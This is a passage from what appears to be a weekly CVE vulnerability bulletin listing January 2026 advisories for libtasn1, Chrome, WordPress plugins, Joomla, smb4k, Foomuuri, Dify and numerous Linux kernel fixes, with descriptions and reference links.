| GnuTLS--libtasn1 | Stack-based buffer overflow in libtasn1 version: v4.20.0. The function fails to validate the size of input data resulting in a buffer overflow in asn1_expend_octet_string. | 2026-01-07 | not yet calculated | CVE-2025-13151 | Source Code Respoitory Proposed Pull Request |
| Google--Chrome | Insufficient policy enforcement in WebView tag in Google Chrome prior to 143.0.7499.192 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: High) | 2026-01-06 | not yet calculated | CVE-2026-0628 | |
| gopiplus@hotmail.com--Scroll rss excerpt | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gopiplus@hotmail.com Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS.This issue affects Scroll rss excerpt: from n/a through <= 5.0. | 2026-01-08 | not yet calculated | CVE-2025-68892 | https://vdp.patchstack.com/database/Wordpress/Plugin/scroll-rss-excerpt/vulnerability/wordpress-scroll-rss-excerpt-plugin-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| gunet--openeclass | The Open eClass platform (formerly known as GUnet eClass) is a complete course management system. Prior to version 4.2, an arbitrary file upload vulnerability in the theme import functionality enables an attacker with administrative privileges to upload arbitrary files on the server's file system. The main cause of the issue is that no validation or sanitization of the file's present inside the zip archive. This leads to remote code execution on the web server. Version 4.2 patches the issue. | 2026-01-08 | not yet calculated | CVE-2026-22241 | https://github.com/gunet/openeclass/security/advisories/GHSA-rf6j-xgqp-wjxg https://github.com/gunet/openeclass/commit/3f9d267b79812a4dd708bb1302339e6a5abe67d9 |
| hands01--e-shops | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hands01 e-shops e-shops-cart2 allows DOM-Based XSS.This issue affects e-shops: from n/a through <= 1.0.4. | 2026-01-08 | not yet calculated | CVE-2025-68890 | https://vdp.patchstack.com/database/Wordpress/Plugin/e-shops-cart2/vulnerability/wordpress-e-shops-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| https://github.com/FoobarOy/--Foomuuri | A Improper Authorization vulnerability in Foomuuri llows arbitrary users to influence the firewall configuration.This issue affects Foomuuri: from ? before 0.31. | 2026-01-08 | not yet calculated | CVE-2025-67603 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-67603 https://security.opensuse.org/2026/01/07/foomuuri-lack-of-dbus-authorization.html |
| https://github.com/FoobarOy/--Foomuuri | A Improper Neutralization of Argument Delimiters vulnerability in Foomuuri can lead to integrity loss of the firewall configuration or further unspecified impact by manipulating the JSON configuration passed to `nft`. This issue affects Foomuuri: from ? before 0.31. | 2026-01-08 | not yet calculated | CVE-2025-67858 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-67858 https://security.opensuse.org/2026/01/07/foomuuri-lack-of-dbus-authorization.html |
| https://github.com/KDE/--smb4k | An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability allows local users ton perform arbitrary unmounts via smb4k mount helper | 2026-01-08 | not yet calculated | CVE-2025-66002 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66002 https://security.opensuse.org/2025/12/10/smb4k-major-issues-in-kauth-helper.html |
| https://github.com/KDE/--smb4k | An External Control of File Name or Path vulnerability in smb4k allowsl ocal users to perform a local root exploit via smb4k mounthelper if they can access and control the contents of a Samba shareThis issue affects smb4k: from ? before 4.0.5. | 2026-01-08 | not yet calculated | CVE-2025-66003 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66003 https://security.opensuse.org/2025/12/10/smb4k-major-issues-in-kauth-helper.html |
| IAMB--Crypt::Sodium::XS | Crypt::Sodium::XS module versions prior to 0.000042, for Perl, include a vulnerable version of libsodium libsodium <= 1.0.20 or a version of libsodium released before December 30, 2025 contains a vulnerability documented as CVE-2025-69277 https://www.cve.org/CVERecord?id=CVE-2025-69277 . The libsodium vulnerability states: In atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group. 0.000042 includes a version of libsodium updated to 1.0.20-stable, released January 3, 2026, which includes a fix for the vulnerability. | 2026-01-06 | not yet calculated | CVE-2025-15444 | https://github.com/jedisct1/libsodium/commit/ad3004ec8731730e93fcfbbc824e67eadc1c1bae https://00f.net/2025/12/30/libsodium-vulnerability/ https://metacpan.org/dist/Crypt-Sodium-XS/changes |
| jcaruso001--Flaming Password Reset | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jcaruso001 Flaming Password Reset flaming-password-reset allows Stored XSS.This issue affects Flaming Password Reset: from n/a through <= 1.0.3. | 2026-01-08 | not yet calculated | CVE-2025-68875 | https://vdp.patchstack.com/database/Wordpress/Plugin/flaming-password-reset/vulnerability/wordpress-flaming-password-reset-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jeroen Schmit--Theater for WordPress | Missing Authorization vulnerability in Jeroen Schmit Theater for WordPress theatre allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Theater for WordPress: from n/a through <= 0.19. | 2026-01-06 | not yet calculated | CVE-2025-69331 | https://vdp.patchstack.com/database/Wordpress/Plugin/theatre/vulnerability/wordpress-theater-for-wordpress-plugin-0-19-broken-access-control-vulnerability?_s_id=cve |
| Joomla! Project--Joomla! CMS | Lack of input filtering leads to an XSS vector in the HTML filter code related to data URLs in img tags. | 2026-01-06 | not yet calculated | CVE-2025-63082 | https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-content-filtering-for-data-urls.html |
| Joomla! Project--Joomla! CMS | Lack of output escaping leads to a XSS vector in the pagebreak plugin. | 2026-01-06 | not yet calculated | CVE-2025-63083 | https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html |
| jvoisin--snuffleupagus | Snuffleupagus is a module that raises the cost of attacks against website by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0. | 2026-01-08 | not yet calculated | CVE-2026-22034 | https://github.com/jvoisin/snuffleupagus/security/advisories/GHSA-c4ch-xw5p-2mvc https://github.com/jvoisin/snuffleupagus/commit/9278dc77bab2a219e770a1b31dd6797bc9070e37 https://github.com/jvoisin/snuffleupagus/blob/9278dc77bab2a219e770a1b31dd6797bc9070e37/src/sp_upload_validation.c#L92-L100 https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.php https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.py https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/ext/standard/dl.c#L165-L166 https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/main/rfc1867.c#L1269-L1274 https://snuffleupagus.readthedocs.io/config.html#upload-validation |
| jwsthemes--OchaHouse | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jwsthemes OchaHouse ochahouse allows PHP Local File Inclusion.This issue affects OchaHouse: from n/a through <= 2.2.8. | 2026-01-08 | not yet calculated | CVE-2025-12550 | https://vdp.patchstack.com/database/Wordpress/Theme/ochahouse/vulnerability/wordpress-ochahouse-theme-2-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| Kaira--Blockons | Missing Authorization vulnerability in Kaira Blockons blockons allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Blockons: from n/a through <= 1.2.15. | 2026-01-08 | not yet calculated | CVE-2025-14360 | https://vdp.patchstack.com/database/Wordpress/Plugin/blockons/vulnerability/wordpress-blockons-plugin-1-2-15-broken-access-control-vulnerability?_s_id=cve |
| KAON--CG3000T | The firmware in KAON CG3000TC and CG3000T routers contains hard-coded credentials in clear text (shared across all routers of this model) that an unauthenticated remote attacker could use to execute commands with root privileges. This vulnerability has been fixed in firmware version: 1.00.67 for CG3000TC and 1.00.27 for CG3000T. | 2026-01-09 | not yet calculated | CVE-2025-7072 | https://cert.pl/posts/2026/01/CVE-2025-7072/ |
| Kentico--Kentico Xperience | Kentico Xperience 13 is vulnerable to a stored cross-site scripting attack via a form component, allowing an attacker to hijack a victim user's session and perform actions in their security context. | 2026-01-05 | not yet calculated | CVE-2025-5591 | https://www.themissinglink.com.au/security-advisories/cve-2025-5591 |
| Kieback&Peter--Neutrino-GLT | Kieback&Peter Neutrino-GLT product is used for building management. It's web component "SM70 PHWEB" is vulnerable to shell command injection via login form. The injected commands would execute with low privileges. The vulnerability has been fixed in version 9.40.02 | 2026-01-07 | not yet calculated | CVE-2025-6225 | https://cert.pl/en/posts/2026/01/CVE-2025-6225/ |
| KnowageLabs--Knowage-Server | Knowage is an open source analytics and business intelligence suite. Prior to version 8.1.37, there is a blind server-side request forgery vulnerability. The vulnerability allows attackers to send requests to arbitrary hosts/paths. Since the attacker is not able to read the response, the impact of this vulnerability is limited. However, an attacker should be able to leverage this vulnerability to scan the internal network. This issue has been patched in version 8.1.37. | 2026-01-07 | not yet calculated | CVE-2025-58441 | https://github.com/KnowageLabs/Knowage-Server/security/advisories/GHSA-m6x8-wh9v-6jxp |
| LambertGroup--CountDown With Image or Video Background | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup CountDown With Image or Video Background countdown-with-background allows Reflected XSS.This issue affects CountDown With Image or Video Background: from n/a through <= 1.5. | 2026-01-08 | not yet calculated | CVE-2025-27002 | https://vdp.patchstack.com/database/Wordpress/Plugin/countdown-with-background/vulnerability/wordpress-countdown-with-image-or-video-background-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Famous - Responsive Image And Video Grid Gallery WordPress Plugin | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Famous - Responsive Image And Video Grid Gallery WordPress Plugin famous_grid_image_and_video_gallery allows Reflected XSS.This issue affects Famous - Responsive Image And Video Grid Gallery WordPress Plugin: from n/a through <= 1.4. | 2026-01-08 | not yet calculated | CVE-2025-27004 | https://vdp.patchstack.com/database/Wordpress/Plugin/famous_grid_image_and_video_gallery/vulnerability/wordpress-famous-responsive-image-and-video-grid-gallery-wordpress-plugin-plugin-1-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| langgenius--dify | Dify is an open-source LLM app development platform. Prior to version 1.11.0, the API key is exposed in plaintext to the frontend, allowing non-administrator users to view and reuse it. This can lead to unauthorized access to third-party services, potentially consuming limited quotas. Version 1.11.0 fixes the issue. | 2026-01-05 | not yet calculated | CVE-2025-67732 | https://github.com/langgenius/dify/security/advisories/GHSA-phpv-94hg-fv9g |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: s390/fpu: Fix false-positive kmsan report in fpu_vstl() A false-positive kmsan report is detected when running ping command. An inline assembly instruction 'vstl' can write varied amount of bytes depending on value of 'index' argument. If 'index' > 0, 'vstl' writes at least 2 bytes. clang generates kmsan write helper call depending on inline assembly constraints. Constraints are evaluated compile-time, but value of 'index' argument is known only at runtime. clang currently generates call to __msan_instrument_asm_store with 1 byte as size. Manually call kmsan function to indicate correct amount of bytes written and fix false-positive report. This change fixes following kmsan reports: [ 36.563119] ===================================================== [ 36.563594] BUG: KMSAN: uninit-value in virtqueue_add+0x35c6/0x7c70 [ 36.563852] virtqueue_add+0x35c6/0x7c70 [ 36.564016] virtqueue_add_outbuf+0xa0/0xb0 [ 36.564266] start_xmit+0x288c/0x4a20 [ 36.564460] dev_hard_start_xmit+0x302/0x900 [ 36.564649] sch_direct_xmit+0x340/0xea0 [ 36.564894] __dev_queue_xmit+0x2e94/0x59b0 [ 36.565058] neigh_resolve_output+0x936/0xb40 [ 36.565278] __neigh_update+0x2f66/0x3a60 [ 36.565499] neigh_update+0x52/0x60 [ 36.565683] arp_process+0x1588/0x2de0 [ 36.565916] NF_HOOK+0x1da/0x240 [ 36.566087] arp_rcv+0x3e4/0x6e0 [ 36.566306] __netif_receive_skb_list_core+0x1374/0x15a0 [ 36.566527] netif_receive_skb_list_internal+0x1116/0x17d0 [ 36.566710] napi_complete_done+0x376/0x740 [ 36.566918] virtnet_poll+0x1bae/0x2910 [ 36.567130] __napi_poll+0xf4/0x830 [ 36.567294] net_rx_action+0x97c/0x1ed0 [ 36.567556] handle_softirqs+0x306/0xe10 [ 36.567731] irq_exit_rcu+0x14c/0x2e0 [ 36.567910] do_io_irq+0xd4/0x120 [ 36.568139] io_int_handler+0xc2/0xe8 [ 36.568299] arch_cpu_idle+0xb0/0xc0 [ 36.568540] arch_cpu_idle+0x76/0xc0 [ 36.568726] default_idle_call+0x40/0x70 [ 36.568953] do_idle+0x1d6/0x390 [ 36.569486] cpu_startup_entry+0x9a/0xb0 [ 36.569745] rest_init+0x1ea/0x290 [ 36.570029] start_kernel+0x95e/0xb90 [ 36.570348] startup_continue+0x2e/0x40 [ 36.570703] [ 36.570798] Uninit was created at: [ 36.571002] kmem_cache_alloc_node_noprof+0x9e8/0x10e0 [ 36.571261] kmalloc_reserve+0x12a/0x470 [ 36.571553] __alloc_skb+0x310/0x860 [ 36.571844] __ip_append_data+0x483e/0x6a30 [ 36.572170] ip_append_data+0x11c/0x1e0 [ 36.572477] raw_sendmsg+0x1c8c/0x2180 [ 36.572818] inet_sendmsg+0xe6/0x190 [ 36.573142] __sys_sendto+0x55e/0x8e0 [ 36.573392] __s390x_sys_socketcall+0x19ae/0x2ba0 [ 36.573571] __do_syscall+0x12e/0x240 [ 36.573823] system_call+0x6e/0x90 [ 36.573976] [ 36.574017] Byte 35 of 98 is uninitialized [ 36.574082] Memory access of size 98 starts at 0000000007aa0012 [ 36.574218] [ 36.574325] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G B N 6.17.0-dirty #16 NONE [ 36.574541] Tainted: [B]=BAD_PAGE, [N]=TEST [ 36.574617] Hardware name: IBM 3931 A01 703 (KVM/Linux) [ 36.574755] ===================================================== [ 63.532541] ===================================================== [ 63.533639] BUG: KMSAN: uninit-value in virtqueue_add+0x35c6/0x7c70 [ 63.533989] virtqueue_add+0x35c6/0x7c70 [ 63.534940] virtqueue_add_outbuf+0xa0/0xb0 [ 63.535861] start_xmit+0x288c/0x4a20 [ 63.536708] dev_hard_start_xmit+0x302/0x900 [ 63.537020] sch_direct_xmit+0x340/0xea0 [ 63.537997] __dev_queue_xmit+0x2e94/0x59b0 [ 63.538819] neigh_resolve_output+0x936/0xb40 [ 63.539793] ip_finish_output2+0x1ee2/0x2200 [ 63.540784] __ip_finish_output+0x272/0x7a0 [ 63.541765] ip_finish_output+0x4e/0x5e0 [ 63.542791] ip_output+0x166/0x410 [ 63.543771] ip_push_pending_frames+0x1a2/0x470 [ 63.544753] raw_sendmsg+0x1f06/0x2180 [ 63.545033] inet_sendmsg+0xe6/0x190 [ 63.546006] __sys_sendto+0x55e/0x8e0 ---truncated--- | 2026-01-05 | not yet calculated | CVE-2025-68751 | https://git.kernel.org/stable/c/946357a538bb47740635c25520924351d2d91544 https://git.kernel.org/stable/c/13dcd6308cb8f67134ee5d5d762b2a66363c695b https://git.kernel.org/stable/c/14e4e4175b64dd9216b522f6ece8af6997d063b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: Implement settime64 with -EOPNOTSUPP ptp_clock_settime() assumes every ptp_clock has implemented settime64(). Stub it with -EOPNOTSUPP to prevent a NULL dereference. The fix is similar to commit 329d050bbe63 ("gve: Implement settime64 with -EOPNOTSUPP"). | 2026-01-05 | not yet calculated | CVE-2025-68752 | https://git.kernel.org/stable/c/9e3dbc3bb2e2aa728b49422b2e5344488f93f690 https://git.kernel.org/stable/c/6d080f810ffd6b8e002ce5bee8b9c551ca2535c2 https://git.kernel.org/stable/c/1e43ebcd5152b3e681a334cc6542fb21770c3a2e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: firewire-motu: add bounds check in put_user loop for DSP events In the DSP event handling code, a put_user() loop copies event data. When the user buffer size is not aligned to 4 bytes, it could overwrite beyond the buffer boundary. Fix by adding a bounds check before put_user(). | 2026-01-05 | not yet calculated | CVE-2025-68753 | https://git.kernel.org/stable/c/ea2c921d9de6e32ca50cb817b9d57bb881be70de https://git.kernel.org/stable/c/6d4f17782ce4facf3197e79707df411ee3d7b30a https://git.kernel.org/stable/c/0d71b3c2ed742f1ccb3b0b7a61afb90c0251093f https://git.kernel.org/stable/c/df692cf2b601a54b34edfdb9e683d67483aa8ce1 https://git.kernel.org/stable/c/8f9e51cf2a2a43d0cd72d3dc0b5ccea3f639c187 https://git.kernel.org/stable/c/298e753880b6ea99ac30df34959a7a03b0878eed |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rtc: amlogic-a4: fix double free caused by devm The clock obtained via devm_clk_get_enabled() is automatically managed by devres and will be disabled and freed on driver detach. Manually calling clk_disable_unprepare() in error path and remove function causes double free. Remove the redundant clk_disable_unprepare() calls from the probe error path and aml_rtc_remove(), allowing the devm framework to automatically manage the clock lifecycle. | 2026-01-05 | not yet calculated | CVE-2025-68754 | https://git.kernel.org/stable/c/9fed02c16488050cd4e33e045506336b216d7301 https://git.kernel.org/stable/c/2e1c79299036614ac32b251d145fad5391f4bcab https://git.kernel.org/stable/c/384150d7a5b60c1086790a8ee07b0629f906cca2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: most: remove broken i2c driver The MOST I2C driver has been completely broken for five years without anyone noticing so remove the driver from staging. Specifically, commit 723de0f9171e ("staging: most: remove device from interface structure") started requiring drivers to set the interface device pointer before registration, but the I2C driver was never updated which results in a NULL pointer dereference if anyone ever tries to probe it. | 2026-01-05 | not yet calculated | CVE-2025-68755 | https://git.kernel.org/stable/c/6cbba922934805f86eece6ba7010b7201962695d https://git.kernel.org/stable/c/6059a66dba7f26b21852831432e17075f1a1c783 https://git.kernel.org/stable/c/e463548fd80e779efea1cb2d3049b8a7231e6925 https://git.kernel.org/stable/c/495df2da6944477d282d5cc0c13174d06e25b310 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: Use RCU in blk_mq_[un]quiesce_tagset() instead of set->tag_list_lock blk_mq_{add,del}_queue_tag_set() functions add and remove queues from tagset, the functions make sure that tagset and queues are marked as shared when two or more queues are attached to the same tagset. Initially a tagset starts as unshared and when the number of added queues reaches two, blk_mq_add_queue_tag_set() marks it as shared along with all the queues attached to it. When the number of attached queues drops to 1 blk_mq_del_queue_tag_set() need to mark both the tagset and the remaining queues as unshared. Both functions need to freeze current queues in tagset before setting on unsetting BLK_MQ_F_TAG_QUEUE_SHARED flag. While doing so, both functions hold set->tag_list_lock mutex, which makes sense as we do not want queues to be added or deleted in the process. This used to work fine until commit 98d81f0df70c ("nvme: use blk_mq_[un]quiesce_tagset") made the nvme driver quiesce tagset instead of quiscing individual queues. blk_mq_quiesce_tagset() does the job and quiesce the queues in set->tag_list while holding set->tag_list_lock also. This results in deadlock between two threads with these stacktraces: __schedule+0x47c/0xbb0 ? timerqueue_add+0x66/0xb0 schedule+0x1c/0xa0 schedule_preempt_disabled+0xa/0x10 __mutex_lock.constprop.0+0x271/0x600 blk_mq_quiesce_tagset+0x25/0xc0 nvme_dev_disable+0x9c/0x250 nvme_timeout+0x1fc/0x520 blk_mq_handle_expired+0x5c/0x90 bt_iter+0x7e/0x90 blk_mq_queue_tag_busy_iter+0x27e/0x550 ? __blk_mq_complete_request_remote+0x10/0x10 ? __blk_mq_complete_request_remote+0x10/0x10 ? __call_rcu_common.constprop.0+0x1c0/0x210 blk_mq_timeout_work+0x12d/0x170 process_one_work+0x12e/0x2d0 worker_thread+0x288/0x3a0 ? rescuer_thread+0x480/0x480 kthread+0xb8/0xe0 ? kthread_park+0x80/0x80 ret_from_fork+0x2d/0x50 ? kthread_park+0x80/0x80 ret_from_fork_asm+0x11/0x20 __schedule+0x47c/0xbb0 ? xas_find+0x161/0x1a0 schedule+0x1c/0xa0 blk_mq_freeze_queue_wait+0x3d/0x70 ? destroy_sched_domains_rcu+0x30/0x30 blk_mq_update_tag_set_shared+0x44/0x80 blk_mq_exit_queue+0x141/0x150 del_gendisk+0x25a/0x2d0 nvme_ns_remove+0xc9/0x170 nvme_remove_namespaces+0xc7/0x100 nvme_remove+0x62/0x150 pci_device_remove+0x23/0x60 device_release_driver_internal+0x159/0x200 unbind_store+0x99/0xa0 kernfs_fop_write_iter+0x112/0x1e0 vfs_write+0x2b1/0x3d0 ksys_write+0x4e/0xb0 do_syscall_64+0x5b/0x160 entry_SYSCALL_64_after_hwframe+0x4b/0x53 The top stacktrace is showing nvme_timeout() called to handle nvme command timeout. timeout handler is trying to disable the controller and as a first step, it needs to blk_mq_quiesce_tagset() to tell blk-mq not to call queue callback handlers. The thread is stuck waiting for set->tag_list_lock as it tries to walk the queues in set->tag_list. The lock is held by the second thread in the bottom stack which is waiting for one of queues to be frozen. The queue usage counter will drop to zero after nvme_timeout() finishes, and this will not happen because the thread will wait for this mutex forever. Given that [un]quiescing queue is an operation that does not need to sleep, update blk_mq_[un]quiesce_tagset() to use RCU instead of taking set->tag_list_lock, update blk_mq_{add,del}_queue_tag_set() to use RCU safe list operations. Also, delete INIT_LIST_HEAD(&q->tag_set_list) in blk_mq_del_queue_tag_set() because we can not re-initialize it while the list is being traversed under RCU. The deleted queue will not be added/deleted to/from a tagset and it will be freed in blk_free_queue() after the end of RCU grace period. | 2026-01-05 | not yet calculated | CVE-2025-68756 | https://git.kernel.org/stable/c/ca8764c0ea1fb825f17f19704af55e9e02c9f768 https://git.kernel.org/stable/c/3baeec23a82e7ee9691f434c6ab0ab1387326108 https://git.kernel.org/stable/c/6e8d363786765a81e35083e0909e076796468edf https://git.kernel.org/stable/c/ef0cd7b694928573f6569e61c14f5f059253162e https://git.kernel.org/stable/c/59e25ef2b413c72da6686d431e7759302cfccafa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vgem-fence: Fix potential deadlock on release A timer that expires a vgem fence automatically in 10 seconds is now released with timer_delete_sync() from fence->ops.release() called on last dma_fence_put(). In some scenarios, it can run in IRQ context, which is not safe unless TIMER_IRQSAFE is used. One potentially risky scenario was demonstrated in Intel DRM CI trybot, BAT run on machine bat-adlp-6, while working on new IGT subtests syncobj_timeline@stress-* as user space replacements of some problematic test cases of a dma-fence-chain selftest [1]. [117.004338] ================================ [117.004340] WARNING: inconsistent lock state [117.004342] 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 Tainted: G S U [117.004346] -------------------------------- [117.004347] inconsistent {HARDIRQ-ON-W} -> {IN-HARDIRQ-W} usage. [117.004349] swapper/0/0 [HC1[1]:SC1[1]:HE0:SE0] takes: [117.004352] ffff888138f86aa8 ((&fence->timer)){?.-.}-{0:0}, at: __timer_delete_sync+0x4b/0x190 [117.004361] {HARDIRQ-ON-W} state was registered at: [117.004363] lock_acquire+0xc4/0x2e0 [117.004366] call_timer_fn+0x80/0x2a0 [117.004368] __run_timers+0x231/0x310 [117.004370] run_timer_softirq+0x76/0xe0 [117.004372] handle_softirqs+0xd4/0x4d0 [117.004375] __irq_exit_rcu+0x13f/0x160 [117.004377] irq_exit_rcu+0xe/0x20 [117.004379] sysvec_apic_timer_interrupt+0xa0/0xc0 [117.004382] asm_sysvec_apic_timer_interrupt+0x1b/0x20 [117.004385] cpuidle_enter_state+0x12b/0x8a0 [117.004388] cpuidle_enter+0x2e/0x50 [117.004393] call_cpuidle+0x22/0x60 [117.004395] do_idle+0x1fd/0x260 [117.004398] cpu_startup_entry+0x29/0x30 [117.004401] start_secondary+0x12d/0x160 [117.004404] common_startup_64+0x13e/0x141 [117.004407] irq event stamp: 2282669 [117.004409] hardirqs last enabled at (2282668): [<ffffffff8289db71>] _raw_spin_unlock_irqrestore+0x51/0x80 [117.004414] hardirqs last disabled at (2282669): [<ffffffff82882021>] sysvec_irq_work+0x11/0xc0 [117.004419] softirqs last enabled at (2254702): [<ffffffff8289fd00>] __do_softirq+0x10/0x18 [117.004423] softirqs last disabled at (2254725): [<ffffffff813d4ddf>] __irq_exit_rcu+0x13f/0x160 [117.004426] other info that might help us debug this: [117.004429] Possible unsafe locking scenario: [117.004432] CPU0 [117.004433] ---- [117.004434] lock((&fence->timer)); [117.004436] <Interrupt> [117.004438] lock((&fence->timer)); [117.004440] *** DEADLOCK *** [117.004443] 1 lock held by swapper/0/0: [117.004445] #0: ffffc90000003d50 ((&fence->timer)){?.-.}-{0:0}, at: call_timer_fn+0x7a/0x2a0 [117.004450] stack backtrace: [117.004453] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G S U 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 PREEMPT(voluntary) [117.004455] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER [117.004455] Hardware name: Intel Corporation Alder Lake Client Platform/AlderLake-P DDR4 RVP, BIOS RPLPFWI1.R00.4035.A00.2301200723 01/20/2023 [117.004456] Call Trace: [117.004456] <IRQ> [117.004457] dump_stack_lvl+0x91/0xf0 [117.004460] dump_stack+0x10/0x20 [117.004461] print_usage_bug.part.0+0x260/0x360 [117.004463] mark_lock+0x76e/0x9c0 [117.004465] ? register_lock_class+0x48/0x4a0 [117.004467] __lock_acquire+0xbc3/0x2860 [117.004469] lock_acquire+0xc4/0x2e0 [117.004470] ? __timer_delete_sync+0x4b/0x190 [117.004472] ? __timer_delete_sync+0x4b/0x190 [117.004473] __timer_delete_sync+0x68/0x190 [117.004474] ? __timer_delete_sync+0x4b/0x190 [117.004475] timer_delete_sync+0x10/0x20 [117.004476] vgem_fence_release+0x19/0x30 [vgem] [117.004478] dma_fence_release+0xc1/0x3b0 [117.004480] ? dma_fence_release+0xa1/0x3b0 [117.004481] dma_fence_chain_release+0xe7/0x130 [117.004483] dma_fence_release+0xc1/0x3b0 [117.004484] ? _raw_spin_unlock_irqrestore+0x27/0x80 [117.004485] dma_fence_chain_irq_work+0x59/0x80 [117.004487] irq_work_single+0x75/0xa0 [117.004490] irq_work_r ---truncated--- | 2026-01-05 | not yet calculated | CVE-2025-68757 | https://git.kernel.org/stable/c/1026d1b0bd55e1be7ba0f9e9b1c9f6e02448f25a https://git.kernel.org/stable/c/9dc3c78d21e16f5af1a9c3d11b4bd5276f891fe0 https://git.kernel.org/stable/c/338e388c0d80ffc04963b6b0ec702ffdfd2c4eba https://git.kernel.org/stable/c/4f335cb8fad69b2be5accf0ebac3a8b345915f4e https://git.kernel.org/stable/c/1f0ca9d3e7c38a39f1f12377c24decf0bba46e54 https://git.kernel.org/stable/c/78b4d6463e9e69e5103f98b367f8984ad12cdc6f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: backlight: led-bl: Add devlink to supplier LEDs LED Backlight is a consumer of one or multiple LED class devices, but devlink is currently unable to create correct supplier-producer links when the supplier is a class device. It creates instead a link where the supplier is the parent of the expected device. One consequence is that removal order is not correctly enforced. Issues happen for example with the following sections in a device tree overlay: // An LED driver chip pca9632@62 { compatible = "nxp,pca9632"; reg = <0x62>; // ... addon_led_pwm: led-pwm@3 { reg = <3>; label = "addon:led:pwm"; }; }; backlight-addon { compatible = "led-backlight"; leds = <&addon_led_pwm>; brightness-levels = <255>; default-brightness-level = <255>; }; In this example, the devlink should be created between the backlight-addon (consumer) and the pca9632@62 (supplier). Instead it is created between the backlight-addon (consumer) and the parent of the pca9632@62, which is typically the I2C bus adapter. On removal of the above overlay, the LED driver can be removed before the backlight device, resulting in: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010 ... Call trace: led_put+0xe0/0x140 devm_led_release+0x6c/0x98 Another way to reproduce the bug without any device tree overlays is unbinding the LED class device (pca9632@62) before unbinding the consumer (backlight-addon): echo 11-0062 >/sys/bus/i2c/drivers/leds-pca963x/unbind echo ...backlight-dock >/sys/bus/platform/drivers/led-backlight/unbind Fix by adding a devlink between the consuming led-backlight device and the supplying LED device, as other drivers and subsystems do as well. | 2026-01-05 | not yet calculated | CVE-2025-68758 | https://git.kernel.org/stable/c/e06df738a9ad8417f1c4c7cd6992cda320e9e7ca https://git.kernel.org/stable/c/30cbe4b642745a9488a0f0d78be43afe69d7555c https://git.kernel.org/stable/c/0e63ea4378489e09eb5e920c8a50c10caacf563a https://git.kernel.org/stable/c/60a24070392ec726ccfe6ad1ca7b0381c8d8f7c9 https://git.kernel.org/stable/c/08c9dc6b0f2c68e5e7c374ac4499e321e435d46c https://git.kernel.org/stable/c/9341d6698f4cfdfc374fb6944158d111ebe16a9d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtl818x: Fix potential memory leaks in rtl8180_init_rx_ring() In rtl8180_init_rx_ring(), memory is allocated for skb packets and DMA allocations in a loop. When an allocation fails, the previously successful allocations are not freed on exit. Fix that by jumping to err_free_rings label on error, which calls rtl8180_free_rx_ring() to free the allocations. Remove the free of rx_ring in rtl8180_init_rx_ring() error path, and set the freed priv->rx_buf entry to null, to avoid double free. | 2026-01-05 | not yet calculated | CVE-2025-68759 | https://git.kernel.org/stable/c/a4fb7cca9837378878e6c94d9e7af019c8fdfcdb https://git.kernel.org/stable/c/bf8513dfa31ea015c9cf415796dca2113d293840 https://git.kernel.org/stable/c/ee7db11742b30641f21306105ad27a275e3c61d7 https://git.kernel.org/stable/c/a813a74570212cb5f3a7d3b05c0cb0cd00bace1d https://git.kernel.org/stable/c/c9d1c4152e6d32fa74034464854bee262a60bc43 https://git.kernel.org/stable/c/9b5b9c042b30befc5b37e4539ace95af70843473 |
